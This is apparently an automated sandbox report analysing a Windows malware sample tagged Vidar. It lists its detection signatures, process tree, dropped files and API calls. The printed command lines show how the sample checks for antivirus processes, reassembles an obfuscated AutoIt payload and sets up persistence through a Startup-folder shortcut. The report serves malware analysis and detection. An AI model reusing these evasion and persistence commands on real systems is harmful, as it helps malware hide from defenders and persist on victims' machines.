Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ldqj18tn.exe

Overview

General Information

Sample name:ldqj18tn.exe
Analysis ID:1577511
MD5:574ab8397d011243cb52bef069bad2dc
SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
Tags:18521511316185215113209bulletproofexeVidaruser-abus3reports
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ldqj18tn.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\ldqj18tn.exe" MD5: 574AB8397D011243CB52BEF069BAD2DC)
    • cmd.exe (PID: 6972 cmdline: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 404 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4092 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3416 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5580 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3664 cmdline: cmd /c md 704579 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5512 cmdline: findstr /V "MARTNMSPIDERRINGTONE" Mh MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5704 cmdline: cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Organizational.pif (PID: 5884 cmdline: Organizational.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5144 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2488 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoMesh.scr (PID: 3816 cmdline: "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 1596, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Organizational.pif u, CommandLine: Organizational.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: Organizational.pif u, ProcessId: 5884, ProcessName: Organizational.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 5884, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ldqj18tn.exe", ParentImage: C:\Users\user\Desktop\ldqj18tn.exe, ParentProcessId: 2276, ParentProcessName: ldqj18tn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ProcessId: 6972, ProcessName: cmd.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 5884, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 1596, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5580, ProcessName: findstr.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ldqj18tn.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.0% probability
Source: ldqj18tn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ldqj18tn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F54005
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00F5494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F53CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5C2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00F5CD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5CD14 FindFirstFileW,FindClose,11_2_00F5CD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD4005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00DD494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDC2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00DDCD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDCD14 FindFirstFileW,FindClose,17_2_00DDCD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD3CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: unknownDNS traffic detected: query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F629BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00F629BA
Source: global trafficDNS traffic detected: DNS query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ldqj18tn.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4002398623.0000000000E39000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ldqj18tn.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InnoMesh.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F64830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00F64830
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DE4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00DE4830
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F64632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00F64632
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F7D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00F7D164
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DFD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_00DFD164

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Consequence entropy: 7.99851486835Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\International entropy: 7.99645540823Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Becoming entropy: 7.99806240446Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Gently entropy: 7.99676588989Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Estimate entropy: 7.99772169864Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Jet entropy: 7.99726981823Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Commodities entropy: 7.99796353937Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Prof entropy: 7.99639738608Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Against entropy: 7.995142844Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Required entropy: 7.9980527323Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Situations entropy: 7.99712082708Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Mood entropy: 7.99795861068Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Princess entropy: 7.99700719992Jump to dropped file
